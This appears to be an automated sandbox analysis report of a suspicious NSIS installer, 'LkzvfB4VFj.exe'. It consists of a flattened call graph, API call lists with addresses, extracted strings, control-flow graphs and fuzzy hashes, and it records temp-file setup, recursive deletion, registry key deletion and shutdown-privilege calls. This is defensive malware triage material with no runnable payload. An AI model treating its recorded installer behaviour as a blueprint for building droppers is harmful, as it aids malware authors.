4587->4494 4592 6feb26e2 4588->4592 4589 6feb277d GlobalAlloc 4593 6feb27a0 4589->4593 4590 6feb2790 4591 6feb2796 GlobalSize 4590->4591 4590->4593 4591->4593 4592->4589 4592->4590 4593->4521 4596 6feb2cce 4594->4596 4595 6feb2d0e GlobalFree 4596->4595 4651 6feb1215 GlobalAlloc 4597->4651 4599 6feb2598 WideCharToMultiByte 4605 6feb24e4 4599->4605 4600 6feb2563 lstrcpynA 4600->4605 4601 6feb2574 StringFromGUID2 WideCharToMultiByte 4601->4605 4602 6feb25b9 wsprintfA 4602->4605 4603 6feb25dd GlobalFree 4603->4605 4604 6feb2617 GlobalFree 4604->4510 4605->4599 4605->4600 4605->4601 4605->4602 4605->4603 4605->4604 4606 6feb1266 2 API calls 4605->4606 4652 6feb12d1 4605->4652 4606->4605 4656 6feb1215 GlobalAlloc 4608->4656 4610 6feb155e 4611 6feb156b 2 API calls 4610->4611 4612 6feb1568 4611->4612 4613 6feb1266 4612->4613 4614 6feb12a8 GlobalFree 4613->4614 4615 6feb126f GlobalAlloc lstrcpynA 4613->4615 4614->4515 4615->4614 4617 6feb1577 wsprintfA 4616->4617 4618 6feb15a4 lstrcpyA 4616->4618 4621 6feb15bd 4617->4621 4618->4621 4621->4519 4623 6feb24ac 4622->4623 4625 6feb17ef 4622->4625 4624 6feb24c5 GlobalFree 4623->4624 4623->4625 4624->4623 4625->4527 4625->4528 4627 6feb1266 2 API calls 4626->4627 4628 6feb1503 4627->4628 4628->4530 4629->4536 4630->4558 4632 6feb1552 4631->4632 4632->4561 4639 6feb1215 GlobalAlloc 4633->4639 4635 6feb1233 lstrcpynA 4635->4550 4636->4567 4637->4556 4638->4562 4639->4635 4641 6feb12b4 4640->4641 4642 6feb1224 2 API calls 4641->4642 4643 6feb12cf 4642->4643 4643->4569 4645 6feb26aa 4644->4645 4646 6feb2654 VirtualAlloc 4644->4646 4645->4575 4646->4645 4648 6feb29ef 4647->4648 4649 6feb29ff 4648->4649 4650 6feb29f4 GetLastError 4648->4650 4649->4583 4650->4649 4651->4605 4653 6feb12da 4652->4653 4654 6feb12f9 4652->4654 4653->4654 4655 6feb12e0 lstrcpyA 4653->4655 4654->4605 4655->4654 4656->4610 4657 40159d 4658 402bce 17 API calls 4657->4658 4659 4015a4 SetFileAttributesA 4658->4659 4660 4015b6 4659->4660 5509 40149d 5510 4014ab PostQuitMessage 5509->5510 5511 402387 5509->5511 5510->5511 4661 401a1e 4662 402bce 17 API calls 4661->4662 4663 401a27 ExpandEnvironmentStringsA 4662->4663 4664 401a3b 4663->4664 4666 401a4e 4663->4666 4665 401a40 lstrcmpA 4664->4665 4664->4666 4665->4666 4667 40171f 4668 402bce 17 API calls 4667->4668 4669 401726 SearchPathA 4668->4669 4670 401741 4669->4670 5517 401d1f 5518 402bac 17 API calls 5517->5518 5519 401d26 5518->5519 5520 402bac 17 API calls 5519->5520 5521 401d32 GetDlgItem 5520->5521 5522 402620 5521->5522 4678 402421 4679 402453 4678->4679 4680 402428 4678->4680 4682 402bce 17 API calls 4679->4682 4681 402c0e 17 API calls 4680->4681 4683 40242f 4681->4683 4684 40245a 4682->4684 4685 402439 4683->4685 4688 402467 4683->4688 4690 402c8c 4684->4690 4687 402bce 17 API calls 4685->4687 4689 402440 RegDeleteValueA RegCloseKey 4687->4689 4689->4688 4691 402c9f 4690->4691 4693 402c98 4690->4693 4691->4693 4694 402cd0 4691->4694 4693->4688 4695 405f7d RegOpenKeyExA 4694->4695 4696 402cfe 4695->4696 4697 402db3 4696->4697 4698 402d08 4696->4698 4697->4693 4699 402d0e RegEnumValueA 4698->4699 4703 402d31 4698->4703 4700 402d98 RegCloseKey 4699->4700 4699->4703 4700->4697 4701 402d6d RegEnumKeyA 4702 402d76 RegCloseKey 4701->4702 4701->4703 4704 406500 5 API calls 4702->4704 4703->4700 4703->4701 4703->4702 4705 402cd0 6 API calls 4703->4705 4706 402d86 4704->4706 4705->4703 4707 402da8 4706->4707 4708 402d8a RegDeleteKeyA 4706->4708 4707->4697 4708->4697 4709 4027a1 4710 402bce 17 API calls 4709->4710 4711 4027a8 FindFirstFileA 4710->4711 4712 4027cb 4711->4712 4716 4027bb 4711->4716 4713 4027d2 4712->4713 4717 406055 wsprintfA 4712->4717 4718 4060f7 lstrcpynA 4713->4718 4717->4713 4718->4716 5523 402626 5524 40262b 5523->5524 5525 40263f 5523->5525 5527 402bac 17 API calls 5524->5527 5526 402bce 17 API calls 5525->5526 5528 402646 lstrlenA 5526->5528 5529 402634 5527->5529 5528->5529 5530 405d37 WriteFile 5529->5530 5531 402668 5529->5531 5530->5531 5532 403ca7 5533 403dfa 5532->5533 5534 403cbf 5532->5534 5536 403e4b 5533->5536 5537 403e0b GetDlgItem GetDlgItem 5533->5537 5534->5533 5535 403ccb 5534->5535 5539 403cd6 SetWindowPos 5535->5539 5540 403ce9 5535->5540 5538 403ea5 5536->5538 5546 401389 2 API calls 5536->5546 5541 40417b 18 API calls 5537->5541 5542 4041c7 SendMessageA 5538->5542 5593 403df5 5538->5593 5539->5540 5543 403d06 5540->5543 5544 403cee ShowWindow 5540->5544 5545 403e35 SetClassLongA 5541->5545 5590 403eb7 5542->5590 5547 403d28 5543->5547 5548 403d0e DestroyWindow 5543->5548 5544->5543 5549 40140b 2 API calls 5545->5549 5550 403e7d 5546->5550 5551 403d2d SetWindowLongA 5547->5551 5552 403d3e 5547->5552 5600 404104 5548->5600 5549->5536 5550->5538 5554 403e81 SendMessageA 5550->5554 5551->5593 5553 403d4a GetDlgItem 5552->5553 5566 403db5 5552->5566 5557 403d5d SendMessageA IsWindowEnabled 5553->5557 5560 403d7a 5553->5560 5554->5593 5555 40140b 2 API calls 5555->5590 5556 404106 DestroyWindow EndDialog 5556->5600 5557->5560 5557->5593 5558 4041e2 8 API calls 5558->5593 5559 404135 ShowWindow 5559->5593 5562 403d87 5560->5562 5563 403dce SendMessageA 5560->5563 5564 403d9a 5560->5564 5572 403d7f 5560->5572 5561 40618a 17 API calls 5561->5590 5562->5563 5562->5572 5563->5566 5567 403da2 5564->5567 5568 403db7 5564->5568 5565 404154 SendMessageA 5565->5566 5566->5558 5571 40140b 2 API calls 5567->5571 5570 40140b 2 API calls 5568->5570 5569 40417b 18 API calls 5569->5590 5570->5572 5571->5572 5572->5565 5572->5566 5573 40417b 18 API calls 5574 403f32 GetDlgItem 5573->5574 5575 403f47 5574->5575 5576 403f4f ShowWindow EnableWindow 5574->5576 5575->5576 5601 40419d EnableWindow 5576->5601 5578 403f79 EnableWindow 5583 403f8d 5578->5583 5579 403f92 GetSystemMenu EnableMenuItem SendMessageA 5580 403fc2 SendMessageA 5579->5580 5579->5583 5580->5583 5582 403c88 18 API calls 5582->5583 5583->5579 5583->5582 5602 4041b0 SendMessageA 5583->5602 5603 4060f7 lstrcpynA 5583->5603 5585 403ff1 lstrlenA 5586 40618a 17 API calls 5585->5586 5587 404002 SetWindowTextA 5586->5587 5588 401389 2 API calls 5587->5588 5588->5590 5589 404046 DestroyWindow 5591 404060 CreateDialogParamA 5589->5591 5589->5600 5590->5555 5590->5556 5590->5561 5590->5569 5590->5573 5590->5589 5590->5593 5592 404093 5591->5592 5591->5600 5594 40417b 18 API calls 5592->5594 5595 40409e GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5594->5595 5596 401389 2 API calls 5595->5596 5597 4040e4 5596->5597 5597->5593 5598 4040ec ShowWindow 5597->5598 5599 4041c7 SendMessageA 5598->5599 5599->5600 5600->5559 5600->5593 5601->5578 5602->5583 5603->5585 4751 40272b 4752 402732 4751->4752 4754 4029aa 4751->4754 4753 402bac 17 API calls 4752->4753 4755 402739 4753->4755 4756 402748 SetFilePointer 4755->4756 4756->4754 4757 402758 4756->4757 4759 406055 wsprintfA 4757->4759 4759->4754 5604 6feb1000 5605 6feb101b 5 API calls 5604->5605 5606 6feb1019 5605->5606 4770 401c2e 4771 402bac 17 API calls 4770->4771 4772 401c35 4771->4772 4773 402bac 17 API calls 4772->4773 4774 401c42 4773->4774 4775 401c57 4774->4775 4776 402bce 17 API calls 4774->4776 4777 401c67 4775->4777 4778 402bce 17 API calls 4775->4778 4776->4775 4779 401c72 4777->4779 4780 401cbe 4777->4780 4778->4777 4781 402bac 17 API calls 4779->4781 4782 402bce 17 API calls 4780->4782 4784 401c77 4781->4784 4783 401cc3 4782->4783 4785 402bce 17 API calls 4783->4785 4786 402bac 17 API calls 4784->4786 4787 401ccc FindWindowExA 4785->4787 4788 401c83 4786->4788 4791 401cea 4787->4791 4789 401c90 SendMessageTimeoutA 4788->4789 4790 401cae SendMessageA 4788->4790 4789->4791 4790->4791 5607 4042b1 lstrcpynA lstrlenA 4798 401e35 GetDC 4799 402bac 17 API calls 4798->4799 4800 401e47 GetDeviceCaps MulDiv ReleaseDC 4799->4800 4801 402bac 17 API calls 4800->4801 4802 401e78 4801->4802 4803 40618a 17 API calls 4802->4803 4804 401eb5 CreateFontIndirectA 4803->4804 4805 402620 4804->4805 5608 402a35 SendMessageA 5609 402a5a 5608->5609 5610 402a4f InvalidateRect 5608->5610 5610->5609 5611 4014b7 5612 4014bd 5611->5612 5613 401389 2 API calls 5612->5613 5614 4014c5 5613->5614 5615 402dba 5616 402dc9 SetTimer 5615->5616 5618 402de2 5615->5618 5616->5618 5617 402e37 5618->5617 5619 402dfc MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5618->5619 5619->5617 4852 4015bb 4853 402bce 17 API calls 4852->4853 4854 4015c2 4853->4854 4855 405b28 4 API calls 4854->4855 4868 4015ca 4855->4868 4856 401624 4858 401652 4856->4858 4859 401629 4856->4859 4857 405aba CharNextA 4857->4868 4862 401423 24 API calls 4858->4862 4860 401423 24 API calls 4859->4860 4861 401630 4860->4861 4871 4060f7 lstrcpynA 4861->4871 4869 40164a 4862->4869 4864 405761 2 API calls 4864->4868 4865 40577e 5 API calls 4865->4868 4866 40163b SetCurrentDirectoryA 4866->4869 4867 40160c GetFileAttributesA 4867->4868 4868->4856 4868->4857 4868->4864 4868->4865 4868->4867 4870 4056e4 4 API calls 4868->4870 4870->4868 4871->4866 5620 4016bb 5621 402bce 17 API calls 5620->5621 5622 4016c1 GetFullPathNameA 5621->5622 5623 4016d8 5622->5623 5629 4016f9 5622->5629 5625 40646b 2 API calls 5623->5625 5623->5629 5624 40170d GetShortPathNameA 5626 402a5a 5624->5626 5627 4016e9 5625->5627 5627->5629 5630 4060f7 lstrcpynA 5627->5630 5629->5624 5629->5626 5630->5629

                                                  Executed Functions

                                                  Function 00403348 Relevance: 89.6, APIs: 32, Strings: 19, Instructions: 366stringcomfileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 403348-403387 SetErrorMode GetVersion 1 403389-403391 call 406500 0->1 2 40339a 0->2 1->2 8 403393 1->8 4 40339f-4033b2 call 406492 lstrlenA 2->4 9 4033b4-4033d0 call 406500 * 3 4->9 8->2 16 4033e1-40343f #17 OleInitialize SHGetFileInfoA call 4060f7 GetCommandLineA call 4060f7 9->16 17 4033d2-4033d8 9->17 24 403441-403446 16->24 25 40344b-403460 call 405aba CharNextA 16->25 17->16 22 4033da 17->22 22->16 24->25 28 403525-403529 25->28 29 403465-403468 28->29 30 40352f 28->30 31 403470-403478 29->31 32 40346a-40346e 29->32 33 403542-40355c GetTempPathA call 403317 30->33 34 403480-403483 31->34 35 40347a-40347b 31->35 32->31 32->32 43 4035b4-4035ce DeleteFileA call 402ea1 33->43 44 40355e-40357c GetWindowsDirectoryA lstrcatA call 403317 33->44 37 403515-403522 call 405aba 34->37 38 403489-40348d 34->38 35->34 37->28 56 403524 37->56 41 4034a5-4034d2 38->41 42 40348f-403495 38->42 45 4034d4-4034da 41->45 46 4034e5-403513 41->46 50 403497-403499 42->50 51 40349b 42->51 59 403662-403672 call 403830 OleUninitialize 43->59 60 4035d4-4035da 43->60 44->43 58 40357e-4035ae GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 403317 44->58 52 4034e0 45->52 53 4034dc-4034de 45->53 46->37 55 403531-40353d call 4060f7 46->55 50->41 50->51 51->41 52->46 53->46 53->52 55->33 56->28 58->43 58->59 72 403796-40379c 59->72 73 403678-403688 call 405813 ExitProcess 59->73 63 403652-403659 call 40390a 60->63 64 4035dc-4035e7 call 405aba 60->64 70 40365e 63->70 76 4035e9-403612 64->76 77 40361d-403627 64->77 70->59 74 403818-403820 72->74 75 40379e-4037b7 GetCurrentProcess OpenProcessToken 72->75 85 403822 74->85 86 403826-40382a ExitProcess 74->86 82 4037e9-4037f7 call 406500 75->82 83 4037b9-4037e3 LookupPrivilegeValueA AdjustTokenPrivileges 75->83 84 403614-403616 76->84 79 403629-403636 call 405b7d 77->79 80 40368e-4036a2 call 40577e lstrcatA 77->80 79->59 94 403638-40364e call 4060f7 * 2 79->94 95 4036a4-4036aa lstrcatA 80->95 96 4036af-4036c9 lstrcatA lstrcmpiA 80->96 97 403805-40380f ExitWindowsEx 82->97 98 4037f9-403803 82->98 83->82 84->77 90 403618-40361b 84->90 85->86 90->77 90->84 94->63 95->96 96->59 100 4036cb-4036ce 96->100 97->74 101 403811-403813 call 40140b 97->101 98->97 98->101 103 4036d0-4036d5 call 4056e4 100->103 104 4036d7 call 405761 100->104 101->74 112 4036dc-4036e9 SetCurrentDirectoryA 103->112 104->112 113 4036f6-40371e call 4060f7 112->113 114 4036eb-4036f1 call 4060f7 112->114 118 403724-403740 call 40618a DeleteFileA 113->118 114->113 121 403781-403788 118->121 122 403742-403752 CopyFileA 118->122 121->118 124 40378a-403791 call 405ed6 121->124 122->121 123 403754-403774 call 405ed6 call 40618a call 405796 122->123 123->121 133 403776-40377d CloseHandle 123->133 124->59 133->121
                                                  APIs
                                                  • SetErrorMode.KERNELBASE ref: 0040336D
                                                  • GetVersion.KERNEL32 ref: 00403373
                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033A6
                                                  • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033E2
                                                  • OleInitialize.OLE32(00000000), ref: 004033E9
                                                  • SHGetFileInfoA.SHELL32(00429850,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403405
                                                  • GetCommandLineA.KERNEL32(Aftopningen Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040341A
                                                  • CharNextA.USER32(00000000,"C:\Users\user\Desktop\LkzvfB4VFj.exe",00000020,"C:\Users\user\Desktop\LkzvfB4VFj.exe",00000000,?,00000007,00000009,0000000B), ref: 00403456
                                                  • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403553
                                                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403564
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403570
                                                  • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403584
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040358C
                                                  • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040359D
                                                  • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004035A5
                                                  • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004035B9
                                                    • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                    • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                    • Part of subcall function 0040390A: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\tranchet,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,75843410), ref: 004039FA
                                                    • Part of subcall function 0040390A: lstrcmpiA.KERNEL32(?,.exe), ref: 00403A0D
                                                    • Part of subcall function 0040390A: GetFileAttributesA.KERNEL32(Call), ref: 00403A18
                                                    • Part of subcall function 0040390A: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\tranchet), ref: 00403A61
                                                    • Part of subcall function 0040390A: RegisterClassA.USER32(0042EBC0), ref: 00403A9E
                                                    • Part of subcall function 00403830: CloseHandle.KERNEL32(000002C4,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B
                                                  • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403667
                                                  • ExitProcess.KERNEL32 ref: 00403688
                                                  • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004037A5
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004037AC
                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037C4
                                                  • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037E3
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403807
                                                  • ExitProcess.KERNEL32 ref: 0040382A
                                                    • Part of subcall function 00405813: MessageBoxIndirectA.USER32(0040A218), ref: 0040586E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                  • String ID: "$"C:\Users\user\Desktop\LkzvfB4VFj.exe"$.tmp$1033$Aftopningen Setup$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\LkzvfB4VFj.exe$C:\Users\user\tranchet$C:\Users\user\tranchet\Trykmaalere$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                  • API String ID: 3776617018-3347189085
                                                  • Opcode ID: 9f7172ca61a1f038ac1aa6a8db1429cac06e36ed1de7e549aa4fc7ed9372f958
                                                  • Instruction ID: 2464a3ec660faf4d6335bd380e0cd13b62da1685a36c15adf6e00eeeb0483762
                                                  • Opcode Fuzzy Hash: 9f7172ca61a1f038ac1aa6a8db1429cac06e36ed1de7e549aa4fc7ed9372f958
                                                  • Instruction Fuzzy Hash: 49C107705047416AD7216F759D89B2F3EACAB4530AF45443FF181BA2E2CB7C8A058B2F
                                                  Function 6FEB1A98 Relevance: 20.1, APIs: 13, Instructions: 591stringlibrarymemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 6FEB1215: GlobalAlloc.KERNELBASE(00000040,6FEB1233,?,6FEB12CF,-6FEB404B,6FEB11AB,-000000A0), ref: 6FEB121D
                                                  • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 6FEB1BC4
                                                  • lstrcpyA.KERNEL32(00000008,?), ref: 6FEB1C0C
                                                  • lstrcpyA.KERNEL32(00000408,?), ref: 6FEB1C16
                                                  • GlobalFree.KERNEL32(00000000), ref: 6FEB1C29
                                                  • GlobalFree.KERNEL32(?), ref: 6FEB1D09
                                                  • GlobalFree.KERNEL32(?), ref: 6FEB1D0E
                                                  • GlobalFree.KERNEL32(?), ref: 6FEB1D13
                                                  • GlobalFree.KERNEL32(00000000), ref: 6FEB1EFA
                                                  • lstrcpyA.KERNEL32(?,?), ref: 6FEB2098
                                                  • GetModuleHandleA.KERNEL32(00000008), ref: 6FEB2114
                                                  • LoadLibraryA.KERNEL32(00000008), ref: 6FEB2125
                                                  • GetProcAddress.KERNEL32(?,?), ref: 6FEB217E
                                                  • lstrlenA.KERNEL32(00000408), ref: 6FEB2198
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92789234716.000000006FEB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FEB0000, based on PE: true
                                                  • Associated: 00000000.00000002.92789161524.000000006FEB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.92789295698.000000006FEB3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.92789366643.000000006FEB5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6feb0000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                  • String ID:
                                                  • API String ID: 245916457-0
                                                  • Opcode ID: c53ad765e7b65e8d7aec757007b1ab9d1272fbdb33c1f3429521f3abc85dd1d9
                                                  • Instruction ID: abfde3e4fb01bb4ab50bc2712e1331edc0fa31e8484f623e0824d5ad0510851b
                                                  • Opcode Fuzzy Hash: c53ad765e7b65e8d7aec757007b1ab9d1272fbdb33c1f3429521f3abc85dd1d9
                                                  • Instruction Fuzzy Hash: FB229D7194460ADEDB118FF88B847EDBFF1BF06329F30462ED1A1A6280D7786582CB51
                                                  Function 004058BF Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 558 4058bf-4058e5 call 405b7d 561 4058e7-4058f9 DeleteFileA 558->561 562 4058fe-405905 558->562 563 405a88-405a8c 561->563 564 405907-405909 562->564 565 405918-405928 call 4060f7 562->565 566 405a36-405a3b 564->566 567 40590f-405912 564->567 573 405937-405938 call 405ad6 565->573 574 40592a-405935 lstrcatA 565->574 566->563 569 405a3d-405a40 566->569 567->565 567->566 571 405a42-405a48 569->571 572 405a4a-405a52 call 40646b 569->572 571->563 572->563 582 405a54-405a68 call 405a8f call 405877 572->582 575 40593d-405940 573->575 574->575 578 405942-405949 575->578 579 40594b-405951 lstrcatA 575->579 578->579 581 405956-405974 lstrlenA FindFirstFileA 578->581 579->581 583 40597a-405991 call 405aba 581->583 584 405a2c-405a30 581->584 594 405a80-405a83 call 40521e 582->594 595 405a6a-405a6d 582->595 592 405993-405997 583->592 593 40599c-40599f 583->593 584->566 586 405a32 584->586 586->566 592->593 596 405999 592->596 597 4059a1-4059a6 593->597 598 4059b2-4059c0 call 4060f7 593->598 594->563 595->571 600 405a6f-405a7e call 40521e call 405ed6 595->600 596->593 602 4059a8-4059aa 597->602 603 405a0b-405a1d FindNextFileA 597->603 608 4059c2-4059ca 598->608 609 4059d7-4059e2 call 405877 598->609 600->563 602->598 607 4059ac-4059b0 602->607 603->583 606 405a23-405a26 FindClose 603->606 606->584 607->598 607->603 608->603 611 4059cc-4059d5 call 4058bf 608->611 618 405a03-405a06 call 40521e 609->618 619 4059e4-4059e7 609->619 611->603 618->603 621 4059e9-4059f9 call 40521e call 405ed6 619->621 622 4059fb-405a01 619->622 621->603 622->603
                                                  APIs
                                                  • DeleteFileA.KERNELBASE(?,?,75843410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E8
                                                  • lstrcatA.KERNEL32(0042B898,\*.*,0042B898,?,?,75843410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405930
                                                  • lstrcatA.KERNEL32(?,0040A014,?,0042B898,?,?,75843410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405951
                                                  • lstrlenA.KERNEL32(?,?,0040A014,?,0042B898,?,?,75843410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405957
                                                  • FindFirstFileA.KERNELBASE(0042B898,?,?,?,0040A014,?,0042B898,?,?,75843410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405968
                                                  • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A15
                                                  • FindClose.KERNEL32(00000000), ref: 00405A26
                                                  Strings
                                                  • "C:\Users\user\Desktop\LkzvfB4VFj.exe", xrefs: 004058BF
                                                  • \*.*, xrefs: 0040592A
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004058CC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: "C:\Users\user\Desktop\LkzvfB4VFj.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                  • API String ID: 2035342205-3804905780
                                                  • Opcode ID: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                                                  • Instruction ID: 53fbf83e18d3e9f22f7fd61ce8145b7df245fbcc76992db59ab4b54644bc6f5f
                                                  • Opcode Fuzzy Hash: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                                                  • Instruction Fuzzy Hash: 4251C470A00A49AADB21AB618D85BBF7A78DF52314F14427FF841711D2C73C8942DF6A
                                                  Function 0040216B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                  Strings
                                                  • C:\Users\user\tranchet\Trykmaalere, xrefs: 00402230
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                  • String ID: C:\Users\user\tranchet\Trykmaalere
                                                  • API String ID: 123533781-2736763094
                                                  • Opcode ID: d5ac8e536bab36e1472226809c0cdf08a9d371e862c1e59943db98e9419baf02
                                                  • Instruction ID: cfd0f9f97044ed47efa98841b374527745dcc5d1cf4597a5ef188e8ddd78f045
                                                  • Opcode Fuzzy Hash: d5ac8e536bab36e1472226809c0cdf08a9d371e862c1e59943db98e9419baf02
                                                  • Instruction Fuzzy Hash: DF510671A00208AFCB50DFE4C989E9D7BB6FF48314F2041AAF515EB2D1DA799981CB54
